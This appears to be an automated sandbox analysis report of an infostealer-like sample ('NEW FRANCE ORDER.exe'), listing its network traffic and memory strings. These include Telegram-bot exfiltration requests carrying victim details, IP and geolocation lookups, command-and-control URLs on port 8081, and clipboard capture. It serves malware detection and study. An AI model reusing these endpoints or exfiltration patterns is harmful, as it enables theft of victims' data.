Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2022:36:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2021:07:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.iaa-airferight.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Mar 2025 18:18:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Mar 2025 18:19:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033FF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000311C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.iaa-airferight.com
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000315F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000315F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000343A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000315F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a
Source: InstallUtil.exe, 0000000B.00000002.2423370342.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000339F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: InstallUtil.exe, 00000007.00000002.2422846155.000000000339A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003323000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.0000000003323000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000334B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000342B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2422846155.000000000341D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000306A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.000000000312F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FFB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003150000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.0000000003142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138-R
Source: InstallUtil.exe, 00000007.00000002.2422846155.0000000003413000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.orgP
Source: InstallUtil.exe, 0000000B.00000002.2423370342.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.orgh~
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
